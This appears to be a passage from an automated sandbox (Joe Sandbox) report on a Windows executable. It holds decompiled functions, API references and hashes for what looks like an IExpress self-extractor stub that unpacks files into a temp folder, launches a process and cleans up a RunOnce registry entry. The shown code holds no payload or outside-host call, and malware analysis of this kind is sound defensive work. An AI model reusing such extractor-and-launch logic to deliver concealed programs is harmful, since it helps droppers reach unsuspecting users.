String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
API String ID: 2209512893-559176071
Opcode ID: 9ca435f2c74eeff74cf01b061701e828f052730f9534e4ee2211cf6bdcabccbc
Instruction ID: 3258154a736c4f099e5337e9d132a58617dc863dd4d74fcd1345071f1510976f
Opcode Fuzzy Hash: 9ca435f2c74eeff74cf01b061701e828f052730f9534e4ee2211cf6bdcabccbc
Instruction Fuzzy Hash: 45113D35E42228FBAB209B919C0DDFFBEACEB467A1F108055B90CA2011D6385B44D6E5

Uniqueness

Uniqueness Score: -1.00%

Function 00076A60 Relevance: 13.6, APIs: 9, Instructions: 138
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t25;
				signed int _t26;
				signed int _t29;
				int _t30;
				signed int _t37;
				signed char _t41;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				signed int _t58;
				signed int _t59;
				intOrPtr* _t60;
				void* _t62;
				void* _t67;
				void* _t68;

				E00077155();
				_push(0x58);
				_push(0x772b8);
				E00077208(__ebx, __edi, __esi);
				 *(_t62 - 0x20) = 0;
				GetStartupInfoW(_t62 - 0x68);
				 *((intOrPtr*)(_t62 - 4)) = 0;
				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
				_t53 = 0;
				while(1) {
					asm("lock cmpxchg [edx], ecx");
					if(0 == 0) {
						break;
					}
					if(0 != _t56) {
						Sleep(0x3e8);
						continue;
					} else {
						_t58 = 1;
						_t53 = 1;
					}
					L7:
					_t67 =  *0x788b0 - _t58; // 0x2
					if(_t67 != 0) {
						__eflags =  *0x788b0; // 0x2
						if(__eflags != 0) {
							 *0x781e4 = _t58;
							goto L13;
						} else {
							 *0x788b0 = _t58;
							_t37 = E00076C3F(0x710b8, 0x710c4); // executed
							__eflags = _t37;
							if(__eflags == 0) {
								goto L13;
							} else {
								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
								_t30 = 0xff;
							}
						}
					} else {
						_push(0x1f);
						L00076FF4();
						L13:
						_t68 =  *0x788b0 - _t58; // 0x2
						if(_t68 == 0) {
							_push(0x710b4);
							_push(0x710ac);
							L00077202();
							 *0x788b0 = 2;
						}
						if(_t53 == 0) {
							 *0x788ac = 0;
						}
						_t71 =  *0x788b4;
						if( *0x788b4 != 0 && E00077060(_t71, 0x788b4) != 0) {
							_t60 =  *0x788b4; // 0x0
							 *0x7a288(0, 2, 0);
							 *_t60();
						}
						_t25 = __imp___acmdln; // 0x76665b9c
						_t59 =  *_t25;
						 *(_t62 - 0x1c) = _t59;
						_t54 =  *(_t62 - 0x20);
						while(1) {
							_t41 =  *_t59;
							if(_t41 > 0x20) {
								goto L32;
							}
							if(_t41 != 0) {
								if(_t54 != 0) {
									goto L32;
								} else {
									while(_t41 != 0 && _t41 <= 0x20) {
										_t59 = _t59 + 1;
										 *(_t62 - 0x1c) = _t59;
										_t41 =  *_t59;
									}
								}
							}
							__eflags =  *(_t62 - 0x3c) & 0x00000001;
							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
								_t29 = 0xa;
							} else {
								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
							}
							_push(_t29);
							_t30 = E00072BFB(0x70000, 0, _t59); // executed
							 *0x781e0 = _t30;
							__eflags =  *0x781f8;
							if( *0x781f8 == 0) {
								exit(_t30); // executed
								goto L32;
							}
							__eflags =  *0x781e4;
							if( *0x781e4 == 0) {
								__imp___cexit();
								_t30 =  *0x781e0; // 0x0
							}
							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
							goto L40;
							L32:
							__eflags = _t41 - 0x22;
							if(_t41 == 0x22) {
								__eflags = _t54;
								_t15 = _t54 == 0;
								__eflags = _t15;
								_t54 = 0 | _t15;
								 *(_t62 - 0x20) = _t54;
							}
							_t26 = _t41 & 0x000000ff;
							__imp___ismbblead(_t26);
							__eflags = _t26;
							if(_t26 != 0) {
								_t59 = _t59 + 1;
								__eflags = _t59;
								 *(_t62 - 0x1c) = _t59;
							}
							_t59 = _t59 + 1;
							 *(_t62 - 0x1c) = _t59;
						}
					}
					L40:
					return E0007724D(_t30);
				}
				_t58 = 1;
				__eflags = 1;
				goto L7;
			}

0x00076a60
0x00076a6a
0x00076a6c
0x00076a71
0x00076a78
0x00076a7f
0x00076a85
0x00076a8e
0x00076a91
0x00076a93
0x00076a9c
0x00076aa2
0x00000000
0x00000000
0x00076aa6
0x00076ab4
0x00000000
0x00076aa8
0x00076aaa
0x00076aab
0x00076aab
0x00076abf
0x00076abf
0x00076ac5
0x00076ad1
0x00076ad7
0x00076b05
0x00000000
0x00076ad9
0x00076ad9
0x00076ae9
0x00076af0
0x00076af2
0x00000000
0x00076af4
0x00076af4
0x00076afb
0x00076afb
0x00076af2
0x00076ac7
0x00076ac7
0x00076ac9
0x00076b0b
0x00076b0b
0x00076b11
0x00076b13
0x00076b18
0x00076b1d
0x00076b24
0x00076b24
0x00076b30
0x00076b39
0x00076b39
0x00076b3b
0x00076b42
0x00076b57
0x00076b5f
0x00076b65
0x00076b65
0x00076b67
0x00076b6c
0x00076b6e
0x00076b71
0x00076b74
0x00076b74
0x00076b79
0x00000000
0x00000000
0x00076b7d
0x00076b81
0x00000000
0x00000000
0x00076b83
0x00076b8c
0x00076b8d
0x00076b90
0x00076b90
0x00076b83
0x00076b81
0x00076b94
0x00076b98
0x00076ba2
0x00076b9a
0x00076b9a
0x00076b9a
0x00076ba3
0x00076bab
0x00076bb0
0x00076bb5
0x00076bbc
0x00076bbf
0x00000000
0x00076bbf
0x00076c1e
0x00076c25
0x00076c27
0x00076c2d
0x00076c2d
0x00076c32
0x00000000
0x00076bc5
0x00076bc5
0x00076bc8
0x00076bcc
0x00076bce
0x00076bce
0x00076bd1
0x00076bd3
0x00076bd3
0x00076bd6
0x00076bda
0x00076be1
0x00076be3
0x00076be5
0x00076be5
0x00076be6
0x00076be6
0x00076be9
0x00076bea
0x00076bea
0x00076b74
0x00076c39
0x00076c3e
0x00076c3e
0x00076abe
0x00076abe
0x00000000

APIs

Part of subcall function 00077155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00077182
Part of subcall function 00077155: GetCurrentProcessId.KERNEL32 ref: 00077191
Part of subcall function 00077155: GetCurrentThreadId.KERNEL32 ref: 0007719A
Part of subcall function 00077155: GetTickCount.KERNEL32 ref: 000771A3
Part of subcall function 00077155: QueryPerformanceCounter.KERNEL32(?), ref: 000771B8

GetStartupInfoW.KERNEL32(?,000772B8,00000058), ref: 00076A7F
Sleep.KERNEL32(000003E8), ref: 00076AB4
_amsg_exit.MSVCRT ref: 00076AC9
_initterm.MSVCRT ref: 00076B1D
__IsNonwritableInCurrentImage.LIBCMT ref: 00076B49
exit.KERNELBASE ref: 00076BBF
_ismbblead.MSVCRT ref: 00076BDA

Memory Dump Source

Source File: 00000000.00000002.366240918.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.366231212.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366252053.0000000000078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_file.jbxd

Similarity

API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
String ID:
API String ID: 836923961-0
Opcode ID: 314d9ea7782bc3982d7bc0e6ce69bc26504a3c2a36fdf274aac1c4a5e798e619
Instruction ID: 0506b879e081538a63b5c8cc9a4b022a295808ff0f766db6898b8e22ea51a2e0
Opcode Fuzzy Hash: 314d9ea7782bc3982d7bc0e6ce69bc26504a3c2a36fdf274aac1c4a5e798e619
Instruction Fuzzy Hash: CC412870D44B14DBEBA19B68DC087AD37E4AB45320F54C01AE90FE7291CF7D48C18B8A

Uniqueness

Uniqueness Score: -1.00%

Function 000758C8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 74
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E000758C8(intOrPtr* __ecx) {
				void* _v8;
				intOrPtr _t6;
				void* _t10;
				void* _t12;
				void* _t14;
				signed char _t16;
				void* _t20;
				void* _t23;
				intOrPtr* _t27;
				CHAR* _t33;

				_push(__ecx);
				_t33 = __ecx;
				_t27 = __ecx;
				_t23 = __ecx + 1;
				do {
					_t6 =  *_t27;
					_t27 = _t27 + 1;
				} while (_t6 != 0);
				_t36 = _t27 - _t23 + 0x14;
				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
				if(_t20 != 0) {
					E00071680(_t20, _t36, _t33);
					E0007658A(_t20, _t36, "TMP4351$.TMP");
					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
					_v8 = _t10;
					LocalFree(_t20);
					_t12 = _v8;
					if(_t12 == 0xffffffff) {
						goto L4;
					} else {
						CloseHandle(_t12);
						_t16 = GetFileAttributesA(_t33); // executed
						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
							goto L4;
						} else {
							 *0x79124 = 0;
							_t14 = 1;
						}
					}
				} else {
					E000744B9(0, 0x4b5, 0, 0, 0x10, 0);
					L4:
					 *0x79124 = E00076285();
					_t14 = 0;
				}
				return _t14;
			}

0x000758cd
0x000758d1
0x000758d3
0x000758d5
0x000758d8
0x000758d8
0x000758da
0x000758db
0x000758e1
0x000758ed
0x000758f1
0x0007591e
0x0007592c
0x00075943
0x0007594a
0x0007594d
0x00075953
0x00075959
0x00000000
0x0007595b
0x0007595c
0x00075963
0x0007596c
0x00000000
0x00075972
0x00075974
0x0007597a
0x0007597a
0x0007596c
0x000758f3
0x00075901
0x00075906
0x0007590b
0x00075910
0x00075910
0x00075918

APIs

LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00075534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 000758E7
CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00075534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00075943
LocalFree.KERNEL32(00000000,?,00075534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0007594D
CloseHandle.KERNEL32(00000000,?,00075534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0007595C
GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00075534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00075963

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 000758CD, 000758CF, 00075919, 00075962
TMP4351$.TMP, xrefs: 00075923

Memory Dump Source

Source File: 00000000.00000002.366240918.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.366231212.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366252053.0000000000078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_file.jbxd

Similarity

API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$TMP4351$.TMP
API String ID: 747627703-3104274291
Opcode ID: 168a3b38fa0be640849f66cb1e7e97d0a81b5d3d4f5720e9ca675585a62ee2b3
Instruction ID: 899f19b123e23bea3b4628dd874354d95753b39c78e86071a58c9e56de2df665
Opcode Fuzzy Hash: 168a3b38fa0be640849f66cb1e7e97d0a81b5d3d4f5720e9ca675585a62ee2b3
Instruction Fuzzy Hash: 1E112671F0061167E7201F795C0DADB7E99EF86361B108A15B60EE31C1CABC984582A8

Uniqueness

Uniqueness Score: -1.00%

Function 00073FEF Relevance: 10.6, APIs: 7, Instructions: 97
processsynchronizationwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00073FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
				signed int _v8;
				char _v524;
				long _v528;
				struct _PROCESS_INFORMATION _v544;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t20;
				void* _t22;
				int _t25;
				intOrPtr* _t39;
				signed int _t44;
				void* _t49;
				signed int _t50;
				intOrPtr _t53;

				_t45 = __edx;
				_t20 =  *0x78004; // 0xdaa0d862
				_v8 = _t20 ^ _t50;
				_t39 = __ecx;
				_t49 = 1;
				_t22 = 0;
				if(__ecx == 0) {
					L13:
					return E00076CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
				if(_t25 == 0) {
					 *0x79124 = E00076285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0);
					_t45 = 0x4c4;
					E000744B9(0, 0x4c4, _t39,  &_v524, 0x10, 0);
					L11:
					_t49 = 0;
					L12:
					_t22 = _t49;
					goto L13;
				}
				WaitForSingleObject(_v544.hProcess, 0xffffffff);
				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
				_t44 = _v528;
				_t53 =  *0x78a28; // 0x0
				if(_t53 == 0) {
					_t34 =  *0x79a2c; // 0x0
					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
						_t34 = _t44 & 0xff000000;
						if((_t44 & 0xff000000) == 0xaa000000) {
							 *0x79a2c = _t44;
						}
					}
				}
				E0007411B(_t34, _t44);
				CloseHandle(_v544.hThread);
				CloseHandle(_v544);
				if(( *0x79a34 & 0x00000400) == 0 || _v528 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x00073fef
0x00073ffa
0x00074001
0x00074008
0x0007400a
0x0007400b
0x00074010
0x0007410a
0x0007411a
0x0007411a
0x0007401c
0x0007401d
0x0007401e
0x0007401f
0x00074033
0x0007403b
0x000740ca
0x000740e9
0x000740f8
0x00074101
0x00074106
0x00074106
0x00074108
0x00074108
0x00000000
0x00074108
0x00074049
0x0007405c
0x00074062
0x00074068
0x0007406e
0x00074070
0x00074077
0x0007407f
0x00074089
0x0007408b
0x0007408b
0x00074089
0x00074077
0x00074091
0x0007409c
0x000740a8
0x000740b8
0x00000000
0x000740c2
0x00000000
0x000740c2

APIs

CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,00000000), ref: 00074033
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00074049
GetExitCodeProcess.KERNELBASE ref: 0007405C
CloseHandle.KERNEL32(?), ref: 0007409C
CloseHandle.KERNEL32(?), ref: 000740A8
GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 000740DC
FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 000740E9

Memory Dump Source

Source File: 00000000.00000002.366240918.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.366231212.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366252053.0000000000078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_file.jbxd

Similarity

API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
String ID:
API String ID: 3183975587-0
Opcode ID: 890e27cca0e5389199a246c73572e253452dc94bfe0c850f38da3366e4414f62
Instruction ID: 44ebbf4f868554ae1f2fba35d3ed73a351cf1428e6a9f9966f8e960d3edf347b
Opcode Fuzzy Hash: 890e27cca0e5389199a246c73572e253452dc94bfe0c850f38da3366e4414f62
Instruction Fuzzy Hash: 45318D31E41208ABFB609B65DC48FAA77B8EB95701F1081A9F60DE2161C73C5CC18AA5

Uniqueness

Uniqueness Score: -1.00%

Function 000751E5 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 74
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E000751E5(void* __eflags) {
				int _t5;
				void* _t6;
				void* _t28;

				_t1 = E0007468F("UPROMPT", 0, 0) + 1; // 0x1
				_t28 = LocalAlloc(0x40, _t1);
				if(_t28 != 0) {
					if(E0007468F("UPROMPT", _t28, _t29) != 0) {
						_t5 = lstrcmpA(_t28, "<None>"); // executed
						if(_t5 != 0) {
							_t6 = E000744B9(0, 0x3e9, _t28, 0, 0x20, 4);
							LocalFree(_t28);
							if(_t6 != 6) {
								 *0x79124 = 0x800704c7;
								L10:
								return 0;
							}
							 *0x79124 = 0;
							L6:
							return 1;
						}
						LocalFree(_t28);
						goto L6;
					}
					E000744B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree(_t28);
					 *0x79124 = 0x80070714;
					goto L10;
				}
				E000744B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0x79124 = E00076285();
				goto L10;
			}

0x000751fb
0x00075207
0x0007520b
0x0007523c
0x00075268
0x00075270
0x0007528b
0x00075293
0x0007529c
0x000752a6
0x000752b0
0x00000000
0x000752b0
0x0007529e
0x00075279
0x00000000
0x0007527b
0x00075273
0x00000000
0x00075273
0x0007524a
0x00075250
0x00075256
0x00000000
0x00075256
0x00075219
0x00075223
0x00000000

APIs

Part of subcall function 0007468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000746A0
Part of subcall function 0007468F: SizeofResource.KERNEL32(00000000,00000000,?,00072D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000746A9
Part of subcall function 0007468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000746C3
Part of subcall function 0007468F: LoadResource.KERNEL32(00000000,00000000,?,00072D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000746CC
Part of subcall function 0007468F: LockResource.KERNEL32(00000000,?,00072D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000746D3
Part of subcall function 0007468F: memcpy_s.MSVCRT ref: 000746E5
Part of subcall function 0007468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000746EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00072F4D,?,00000002,00000000), ref: 00075201
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00075250

Part of subcall function 000744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00074518
Part of subcall function 000744B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00074554

Part of subcall function 00076285: GetLastError.KERNEL32(00075BBC), ref: 00076285

Strings

<None>, xrefs: 00075262
UPROMPT, xrefs: 000751EF, 00075230

Memory Dump Source

Source File: 00000000.00000002.366240918.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.366231212.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366252053.0000000000078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_file.jbxd

Similarity

API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
String ID: <None>$UPROMPT
API String ID: 957408736-2980973527
Opcode ID: a0a220e9eee18939bbab52e2705460cc195c0e2ff65ef4c36f72802d852ed395
Instruction ID: d4ff433de2dfd319ec3ca6404269b949666888102c51efeb2defe6bbc2628ddf
Opcode Fuzzy Hash: a0a220e9eee18939bbab52e2705460cc195c0e2ff65ef4c36f72802d852ed395
Instruction Fuzzy Hash: 6A11E6B1F006016BF3646B715C45FBF61DDEBCA341B50C429B60EE61D2EABD8C42516D

Uniqueness

Uniqueness Score: -1.00%

Function 000752B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65
fileCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E000752B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				char _v268;
				signed int _t9;
				signed int _t11;
				void* _t21;
				void* _t29;
				CHAR** _t31;
				void* _t32;
				signed int _t33;

				_t28 = __edi;
				_t22 = __ecx;
				_t21 = __ebx;
				_t9 =  *0x78004; // 0xdaa0d862
				_v8 = _t9 ^ _t33;
				_push(__esi);
				_t31 =  *0x791e0; // 0x2dd8320
				if(_t31 != 0) {
					_push(__edi);
					do {
						_t29 = _t31;
						if( *0x78a24 == 0 &&  *0x79a30 == 0) {
							SetFileAttributesA( *_t31, 0x80); // executed
							DeleteFileA( *_t31); // executed
						}
						_t31 = _t31[1];
						LocalFree( *_t29);
						LocalFree(_t29);
					} while (_t31 != 0);
					_pop(_t28);
				}
				_t11 =  *0x78a20; // 0x0
				_pop(_t32);
				if(_t11 != 0 &&  *0x78a24 == 0 &&  *0x79a30 == 0) {
					_push(_t22);
					E00071781( &_v268, 0x104, _t22, "C:\Users\alfons\AppData\Local\Temp\IXP000.TMP\");
					if(( *0x79a34 & 0x00000020) != 0) {
						E000765E8( &_v268);
					}
					SetCurrentDirectoryA(".."); // executed
					_t22 =  &_v268;
					E00072390( &_v268);
					_t11 =  *0x78a20; // 0x0
				}
				if( *0x79a40 != 1 && _t11 != 0) {
					_t11 = E00071FE1(_t22); // executed
				}
				 *0x78a20 =  *0x78a20 & 0x00000000;
				return E00076CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
			}

0x000752b6
0x000752b6
0x000752b6
0x000752c1
0x000752c8
0x000752cb
0x000752cc
0x000752d4
0x000752d6
0x000752d7
0x000752de
0x000752e0
0x000752f2
0x000752fa
0x000752fa
0x00075302
0x00075305
0x0007530c
0x00075312
0x00075316
0x00075316
0x00075317
0x0007531c
0x0007531f
0x00075333
0x00075345
0x00075351
0x00075359
0x00075359
0x00075363
0x00075369
0x0007536f
0x00075374
0x00075374
0x00075381
0x00075387
0x00075387
0x0007538f
0x000753a0

APIs

SetFileAttributesA.KERNELBASE(02DD8320,00000080,?,00000000), ref: 000752F2
DeleteFileA.KERNELBASE(02DD8320), ref: 000752FA
LocalFree.KERNEL32(02DD8320,?,00000000), ref: 00075305
LocalFree.KERNEL32(02DD8320), ref: 0007530C
SetCurrentDirectoryA.KERNELBASE(000711FC,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00075363

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00075334

Memory Dump Source

Source File: 00000000.00000002.366240918.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.366231212.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366252053.0000000000078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_file.jbxd

Similarity

API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
API String ID: 2833751637-1193786559
Opcode ID: 35d8b58b58e0d80d5bc772e3cc4c1a96722ffdce6f079d541ffa361dbe95380c
Instruction ID: a46b1480ac1249e938496dee0b07d5622f7e5757bbd6631af6bdbbe8e038f6ae
Opcode Fuzzy Hash: 35d8b58b58e0d80d5bc772e3cc4c1a96722ffdce6f079d541ffa361dbe95380c
Instruction Fuzzy Hash: 5421BE31E01A04EBFB609B24DC09BA937B0BB44352F048569E84E661B1CBFD5EC4CB89

Uniqueness

Uniqueness Score: -1.00%

Function 00071FE1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00071FE1(void* __ecx) {
				void* _v8;
				long _t4;

				if( *0x78530 != 0) {
					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
					if(_t4 == 0) {
						RegDeleteValueA(_v8, "wextract_cleanup0"); // executed
						return RegCloseKey(_v8);
					}
				}
				return _t4;
			}

0x00071fee
0x00072005
0x0007200d
0x00072017
0x00000000
0x00072020
0x0007200d
0x00072029

APIs

RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,0007538C,?,?,0007538C), ref: 00072005
RegDeleteValueA.KERNELBASE(0007538C,wextract_cleanup0,?,?,0007538C), ref: 00072017
RegCloseKey.ADVAPI32(0007538C,?,?,0007538C), ref: 00072020

Strings

Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00071FFB
wextract_cleanup0, xrefs: 00071FE7, 0007200F

Memory Dump Source

Source File: 00000000.00000002.366240918.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.366231212.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366252053.0000000000078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_file.jbxd

Similarity

API ID: CloseDeleteOpenValue
String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
API String ID: 849931509-702805525
Opcode ID: d5b7e6b09dc894a01666a83bed7c9837fb5dd9a6c817bcb1a9c2dfea1267ea49
Instruction ID: 28a69df718dccc3390d269e20979b7bf82d26589336b413ca9648affac54e4cc
Opcode Fuzzy Hash: d5b7e6b09dc894a01666a83bed7c9837fb5dd9a6c817bcb1a9c2dfea1267ea49
Instruction Fuzzy Hash: E6E04F34E90318FBEB218B90EC0EF5E7BA9F741785F104198BA0CB0061EB6D5A94D799

Uniqueness

Uniqueness Score: -1.00%

Function 00074CD0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 146
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00074CD0(char* __edx, long _a4, int _a8) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				int _t30;
				long _t32;
				signed int _t33;
				long _t35;
				long _t36;
				struct HWND__* _t37;
				long _t38;
				long _t39;
				long _t41;
				long _t44;
				long _t45;
				long _t46;
				signed int _t50;
				long _t51;
				char* _t58;
				long _t59;
				char* _t63;
				long _t64;
				CHAR* _t71;
				CHAR* _t74;
				int _t75;
				signed int _t76;

				_t69 = __edx;
				_t29 =  *0x78004; // 0xdaa0d862
				_t30 = _t29 ^ _t76;
				_v8 = _t30;
				_t75 = _a8;
				if( *0x791d8 == 0) {
					_t32 = _a4;
					__eflags = _t32;
					if(_t32 == 0) {
						_t33 = E00074E99(_t75);
						L35:
						return E00076CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
					}
					_t35 = _t32 - 1;
					__eflags = _t35;
					if(_t35 == 0) {
						L9:
						_t33 = 0;
						goto L35;
					}
					_t36 = _t35 - 1;
					__eflags = _t36;
					if(_t36 == 0) {
						_t37 =  *0x78584; // 0x0
						__eflags = _t37;
						if(_t37 != 0) {
							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
						}
						_t54 = 0x791e4;
						_t58 = 0x791e4;
						do {
							_t38 =  *_t58;
							_t58 =  &(_t58[1]);
							__eflags = _t38;
						} while (_t38 != 0);
						_t59 = _t58 - 0x791e5;
						__eflags = _t59;
						_t71 =  *(_t75 + 4);
						_t73 =  &(_t71[1]);
						do {
							_t39 =  *_t71;
							_t71 =  &(_t71[1]);
							__eflags = _t39;
						} while (_t39 != 0);
						_t69 = _t71 - _t73;
						_t30 = _t59 + 1 + _t71 - _t73;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							L3:
							_t33 = _t30 | 0xffffffff;
							goto L35;
						}
						_t69 = 0x791e4;
